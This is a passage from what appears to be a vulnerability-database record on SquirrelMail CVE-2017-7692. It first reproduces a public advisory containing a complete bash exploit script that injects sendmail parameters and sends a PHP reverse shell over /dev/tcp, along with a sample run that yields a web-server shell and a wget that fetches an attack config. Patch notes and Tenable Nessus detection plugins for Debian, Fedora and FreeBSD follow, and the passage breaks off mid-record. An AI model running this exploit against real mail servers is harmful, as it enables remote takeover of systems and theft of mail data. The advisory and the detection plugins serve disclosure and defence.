(__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \nSquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) \n \nSquirrelMail_RCE_exploit.sh (ver. 1.0) \n \nDiscovered and coded by \n \nDawid Golunski (@dawid_golunski) \nhttps://legalhackers.com \n \nExploitBox project: \nhttps://ExploitBox.io \n \n\\033[0m' \n \n# Quick and messy PoC for SquirrelMail webmail application. \n# It contains payloads for 2 vectors: \n# * File Write \n# * RCE \n# It requires user credentials and that SquirrelMail uses \n# Sendmail method as email delivery transport \n# \n# \n# Full advisory URL: \n# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n# \n# Tested on: # Ubuntu 16.04 \n# squirrelmail package version: \n# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 \n# \n# Disclaimer: \n# For testing purposes only \n# \n# \n# ----------------------------------------------------------------- \n# \n# Interested in vulns/exploitation? \n# Stay tuned for my new project - ExploitBox \n# \n# .;lc' \n# .,cdkkOOOko;. \n# .,lxxkkkkOOOO000Ol' \n# .':oxxxxxkkkkOOOO0000KK0x:' \n# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. \n# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. \n# '';ldxxxxxdc,. ,oOXXXNNNXd;,. \n# .ddc;,,:c;. ,c: .cxxc:;:ox: \n# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: \n# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: \n# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: \n# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: \n# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: \n# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: \n# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: \n# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: \n# .dxxxxxdl;. ., .. .;cdxxxxxx: \n# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: \n# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. \n# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. \n# .':oxxxxxxxxx.ckkkkkkkkxl,. \n# .,cdxxxxx.ckkkkkxc. \n# .':odx.ckxl,. \n# .,.'. \n# \n# https://ExploitBox.io \n# \n# https://twitter.com/Exploit_Box \n# \n# ----------------------------------------------------------------- \n \nsqspool=\"/var/spool/squirrelmail/attach/\" \n \necho -e \"$int\" \n#echo -e \"\\033[94m \\nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \\n\" \n#echo -e \"SquirrelMail_RCE_exploit.sh (ver. 1.0)\\n\" \n#echo -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttps://legalhackers.com \\033[0m\\n\\n\" \n \n \n# Base URL \nif [ $# -ne 1 ]; then \necho -e \"Usage: \\n$0 SquirrelMail_URL\" \necho -e \"Example: \\n$0 http://target/squirrelmail/ \\n\" \n \nexit 2 \nfi \nURL=\"$1\" \n \n# Log in \necho -e \"\\n[*] Enter SquirrelMail user credentials\" \nread -p \"user: \" squser \nread -sp \"pass: \" sqpass \n \necho -e \"\\n\\n[*] Logging in to SquirrelMail at $URL\" \ncurl -s -D /tmp/sqdata -d\"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1\" $URL/src/redirect.php | grep -q incorrect \nif [ $? -eq 0 ]; then \necho \"Invalid creds\" \nexit 2 \nfi \nsessid=\"`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\" \nkeyid=\"`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\" \n \n \n# Prepare Sendmail cnf \n# \n# * The config will launch php via the following stanza: \n# \n# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, \n# T=DNS/RFC822/X-Unix, \n# A=php -- $u $h ${client_addr} \n# \nwget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf \n \n# Upload config \necho -e \"\\n\\n[*] Uploading Sendmail config\" \ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/compose.php?mailbox=INBOX&startMessage=1\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\" \nattachid=\"`curl -H \"Expect:\" -s -b\"SQMSESSID=$sessid; key=$keyid\" -F\"smtoken=$token\" -F\"send_to=$mail\" -F\"subject=attach\" -F\"body=test\" -F\"attachfile=@/tmp/smcnf-exp\" -F\"username=$squser\" -F\"attach=Add\" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'\"' '{print $2}' | tr -d '\\n'`\" \nif [ ${#attachid} -lt 32 ]; then \necho \"Something went wrong. Failed to upload the sendmail file.\" \nexit 2 \nfi \n \n# Create Sendmail cmd string according to selected payload \necho -e \"\\n\\n[?] Select payload\\n\" \n# SELECT PAYLOAD \necho \"1 - File write (into /tmp/sqpoc)\" \necho \"2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)\" \necho \nread -p \"[1-2] \" pchoice \n \ncase $pchoice in \n1) payload=\"$squser@localhost -oQ/tmp/ -X/tmp/sqpoc\" \n;; \n \n2) payload=\"$squser@localhost -oQ/tmp/ -C$sqspool/$attachid\" \n;; \nesac \n \nif [ $pchoice -eq 2 ]; then \necho \nread -p \"Reverese shell IP: \" reverse_ip \nread -p \"Reverese shell PORT: \" reverse_port \nfi \n \n# Reverse shell code \nphprevsh=\" \n<?php \n\\$cmd = \\\"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\\\"; \nfile_put_contents(\\\"/tmp/cmd\\\", 'export PATH=\\\"\\$PATH\\\" ; export TERM=vt100 ;' . \\$cmd); \nsystem(\\\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\\\"); \n?>\" \n \n \n# Set sendmail params in user settings \necho -e \"\\n[*] Injecting Sendmail command parameters\" \ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/options.php?optpage=personal\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\" \ncurl -s -b\"SQMSESSID=$sessid; key=$keyid\" -d \"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit\" --data-urlencode \"new_email_address=$payload\" \"$URL/src/options.php?optpage=personal\" | grep -q 'Success' 2>/dev/null \nif [ $? -ne 0 ]; then \necho \"Failed to inject sendmail parameters\" \nexit 2 \nfi \n \n# Send email which triggers the RCE vuln and runs phprevsh \necho -e \"\\n[*] Sending the email to trigger the vuln\" \n(sleep 2s && curl -s -D/tmp/sheaders -b\"SQMSESSID=$sessid; key=$keyid\" -d\"smtoken=$token\" -d\"startMessage=1\" -d\"session=0\" \\ \n-d\"send_to=$squser@localhost\" -d\"subject=poc\" --data-urlencode \"body=$phprevsh\" -d\"send=Send\" -d\"username=$squser\" $URL/src/compose.php) & \n \nif [ $pchoice -eq 2 ]; then \necho -e \"\\n[*] Waiting for shell on $reverse_ip port $reverse_port\" \nnc -vv -l -p $reverse_port \nelse \necho -e \"\\n[*] The test file should have been written at /tmp/sqpoc\" \nfi \n \ngrep -q \"302 Found\" /tmp/sheaders \nif [ $? -eq 1 ]; then \necho \"There was a problem with sending email\" \nexit 2 \nfi \n \n \n# Done \necho -e \"\\n[*] All done. Exiting\" \n \n \n \n-------[ EOF ]-------- \n \n \n \nExample run: \n~~~~~~~~~~~~ \n \n$ ./SquirrelMail_RCE_exploit.sh http://xenial/squirrelmail/ \n \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \nSquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) \n \nSquirrelMail_RCE_exploit.sh (ver. 1.0) \n \nDiscovered and coded by \n \nDawid Golunski (@dawid_golunski) \nhttps://legalhackers.com \n \nExploitBox project: \nhttps://ExploitBox.io \n \n \n \n[*] Enter SquirrelMail user credentials \nuser: attacker \npass: \n \n[*] Logging in to SquirrelMail at http://xenial/squirrelmail/ \n \n \n[*] Uploading Sendmail config \n \n \n[?] Select payload \n \n1 - File write (into /tmp/sqpoc) \n2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh) \n \n[1-2] 2 \n \nReverese shell IP: 192.168.57.1 \nReverese shell PORT: 1337 \n \n[*] Injecting Sendmail command parameters \n \n[*] Sending the email to trigger the vuln \n \n[*] Waiting for shell on 192.168.57.1 port 1337 \nListening on [0.0.0.0] (family 0, port 1337) \nConnection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport 60608) \nbash: cannot set terminal process group (12208): Inappropriate ioctl for device \nbash: no job control in this shell \nwww-data@vulnsys:/tmp$ id \nid \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \nwww-data@vulnsys:/tmp$ dpkg -l | grep squirrelmail \ndpkg -l | grep squirrelmail \nii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1 all Webmail for nuts \nwww-data@vulnsys:/tmp$ exit \nexit \nexit \n \n[*] All done. Exiting \n \n \nVideo PoC: \n~~~~~~~~~~~~ \n \nhttps://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nA successful exploitation could let remote attackers to gain access to \nthe target server in the context of the web server account which could \nlead to a full compromise of the web application. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nThe latest version of SquirrelMail 1.4.22 and below are affected. \n \nVIII. SOLUTION / VENDOR RESPONSE \n------------------------- \n \nThe vulnerability was first reported to SquirrelMail vendor by the \nauthor of this advisory which resulted in CVE-ID (2017-5181) issued on 4th \nJanuary. The vendor requested more time due to personal issues. \n \nThe vulnerability was however discovered and published in April by another \nresearcher on full-disclosure list which triggered the release \nof this advisory without an official solution available. \n \nAs a temporary solution users can switch to SMTP based transport (as \nopposed to Sendmail). \n \nAs advised by MITRE, this vulnerability should now be tracked under the \nnew CVEID - CVE-2017-7692. \n \nVendor has been advised that the isue is now public. No response has been \nreceived yet. \n \nIX. REFERENCES \n------------------------- \n \nhttps://legalhackers.com \n \nhttps://ExploitBox.io \n \nThis / CVE-2017-7692 advisory URL: \nhttps://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n \nVideo PoC exploit: \nhttps://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n \nExploit code: \nThe simple PoC shown above is available here: \nhttps://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh \nhttps://legalhackers.com/exploits/sendmail-exploit.cnf \n \nCVE-2017-7692 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7692 \n \nVendor site: \nhttps://squirrelmail.org \n \nRelated OSS-SECURITY /full-disclosure messages: \nhttp://seclists.org/fulldisclosure/2017/Apr/89 \nhttp://www.openwall.com/lists/oss-security/2017/04/19/7 \n \n \n \nSimilar vulnerabilities discovered by the author (PHPMailer & SwiftMailer): \n \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html \nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability was first discovered/reported by Dawid Golunski \ndawid (at) legalhackers (dot) com \nhttps://legalhackers.com \n \nFilippo Cavallarin, who also reported the vulnerability at a later date \n(see the oss-security thread referenced below for details) \n \n \nXI. REVISION HISTORY \n------------------------- \n \n22.04.2017 - Advisory released \n \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142266/squirrelmail1422-exec.txt"}], "nessus": [{"lastseen": "2021-01-12T09:44:28", "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "title": "Debian DLA-941-1 : squirrelmail security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-05-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:squirrelmail", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-941.NASL", "href": "https://www.tenable.com/plugins/nessus/100176", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-941-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100176);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n\n script_name(english:\"Debian DLA-941-1 : squirrelmail security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/squirrelmail\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"squirrelmail\", reference:\"2:1.4.23~svn20120406-2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:45", "description": "fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : squirrelmail (2017-a7161eb173)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:squirrelmail", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-A7161EB173.NASL", "href": "https://www.tenable.com/plugins/nessus/101697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a7161eb173.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101697);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"FEDORA\", value:\"2017-a7161eb173\");\n\n script_name(english:\"Fedora 26 : squirrelmail (2017-a7161eb173)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a7161eb173\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"squirrelmail-1.4.22-19.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squirrelmail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:59:07", "description": "SquirrelMail developers report :\n\nSquirrelMail 1.4.22 (and other versions before 20170427_0200-SVN)\nallows post-authentication remote code execution via a sendmail.cf\nfile that is mishandled in a popen call. It's possible to exploit this\nvulnerability to execute arbitrary shell commands on the remote\nserver.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-23T00:00:00", "title": "FreeBSD : SquirrelMail -- post-authentication remote code execution (e1de77e8-c45e-48d7-8866-5a6f943046de)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-08-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:squirrelmail"], "id": "FREEBSD_PKG_E1DE77E8C45E48D788665A6F943046DE.NASL", "href": "https://www.tenable.com/plugins/nessus/102691", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102691);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7692\");\n\n script_name(english:\"FreeBSD : SquirrelMail -- post-authentication remote code execution (e1de77e8-c45e-48d7-8866-5a6f943046de)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SquirrelMail developers report :\n\nSquirrelMail 1.4.22 (and other versions before 20170427_0200-SVN)\nallows post-authentication remote code execution via a sendmail.cf\nfile that is mishandled in a popen call. It's possible to exploit this\nvulnerability to execute arbitrary shell commands on the remote\nserver.\"\n );\n # https://vuxml.freebsd.org/freebsd/e1de77e8-c45e-48d7-8866-5a6f943046de.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29050a63\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"squirrelmail<20170705\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:15:12", "description": "fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-05T00:00:00", "title": "Fedora 25 : squirrelmail (2017-f85c37ae3d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-06-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:squirrelmail", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-F85C37AE3D.NASL", "href": "https://www.tenable.com/plugins/nessus/100609", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The 